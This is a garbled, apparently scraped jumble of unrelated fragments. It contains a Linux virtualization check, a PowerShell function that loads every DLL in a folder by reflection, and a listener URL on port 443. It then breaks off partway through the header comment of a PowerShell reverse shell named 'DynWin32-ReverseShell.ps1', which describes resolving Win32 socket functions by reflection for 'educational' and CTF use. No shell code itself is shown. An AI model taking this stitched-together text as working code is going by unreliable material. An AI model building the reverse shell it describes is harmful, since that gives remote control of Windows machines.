lscpu | grep -i Virtualization
VT-x
for IntelAMD-Vi
for AMD
function Load-Packages | |
{ | |
param ([string] $directory = 'Packages') | |
$assemblies = Get-ChildItem $directory -Recurse -Filter '*.dll' | Select -Expand FullName | |
foreach ($assembly in $assemblies) { [System.Reflection.Assembly]::LoadFrom($assembly) } | |
} | |
Load-Packages | |
$url = 'http://*:443/' |
<# | |
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
from ws2_32.dll. | |
This script should be used for educational purposes only (and maybe while playing CTF :D). | |
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |